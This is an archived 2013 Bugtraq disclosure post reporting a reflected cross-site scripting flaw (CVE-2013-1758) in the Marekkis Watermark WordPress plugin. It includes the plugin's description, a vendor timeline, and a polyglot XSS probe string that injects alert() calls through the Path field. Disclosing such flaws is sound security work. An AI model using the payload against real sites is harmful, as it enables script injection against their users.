lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 18 Feb 2013 17:20:12 GMT
From: nauty.me04@...il.com
To: bugtraq@...urityfocus.com
Subject: Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting
 Vulnerability

#############################
Exploit Title : Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting Vulnerability
Author: Aditya Balapure
home: http://adityabalapure.blogspot.in/
Date: 18/02/13
software link:  http://wordpress.org/extend/plugins/marekkis-watermark/
CVE Assigned - CVE-2013-1758

#############################
Marekkis Watermark-Plugin description

Marekkis Watermark-Plugin for WordPress can watermark your pictures an two different ways:

Insert your watermark while the picture is being uploaded.
After the activation every picture that you will upload with wordpress build-in media-uploader will be watermarked.

In the configuration-screen you can set up the position and the type of your watermark. It can be your logo (.png-file) with transparent background or a free text with color, font, size, shadow and transparency-level of your choice. See screenshots.

Insert your watermark on all chosen pictures from a directory on your web-server.
Marekkis Watermark makes possible to create a watermark on mediafiles that are already uploaded on your server. So you can mark all your old pictures with the new watermark.


##########################
XSS location

The Marekkis Watermark-Plugin in Wordpress http://wordpress.org/extend/plugins/marekkis-watermark/ has a Reflected XSS Vulnerability in the Path input box.

Script Used-
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

##########################
Vendor Notification

05/02/2013 to: - Vendor notified awaiting action
17/02/2013 - Fixed and closed

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ